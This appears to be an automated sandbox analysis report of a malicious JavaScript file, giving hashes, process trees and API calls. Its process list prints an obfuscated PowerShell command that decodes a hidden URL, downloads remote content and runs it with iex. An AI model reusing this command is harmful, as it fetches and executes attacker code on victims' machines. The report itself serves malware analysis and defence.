Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 12, 2023, 8:02 a.m.	July 12, 2023, 8:04 a.m.

Size	439.4KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR, LF line terminators
MD5	`5dc5797adb91fb7c0609d3d6a7b7184a`
SHA256	`aff022471daf3087b5492eb57b0c22197826ea5bd31392fe3b72cad8553c3f96`
CRC32	`8F028B28`
ssdeep	`3072:Y7iPO80tXW8UsIAAZRQlnqiKm0t0eirr1OFdo1ltXpc2pUjqTRECoNjrdH37D:x`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\notice_11_jul_7701757.js
2992
conhost.exe conhost --headless powershell @(9095,9082,9099,9081,9078,9099,9023,9093,9088,9089,9024,9026,9023,9089,9081,9089,9040,9081,9074,9092,9081,9038)|foreach{$vkhlrgandquy=$vkhlrgandquy+[char]($_-8977);$mrtebosagxif=$vkhlrgandquy};$fbvqlx='l'; new-alias tixxs cur$fbvqlx;$afswe=('sduzu',$mrtebosagxif);.$([char](8892-8787)+'ex')(tixxs -useb "$afswe[1]")
2208

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

No Suricata Alerts

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 12, 2023, 8:02 a.m.	computer_name: TEST22-PC	1	1	0

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod July 12, 2023, 8:02 a.m.	inargs.CurrentDirectory: None inargs.CommandLine: time inargs.ProcessStartupInformation: None outargs.ProcessId: None outargs.ReturnValue: 9 flags: 0 method: Create class: Win32_Process	1	0	0

notice_11_jul_7701757.js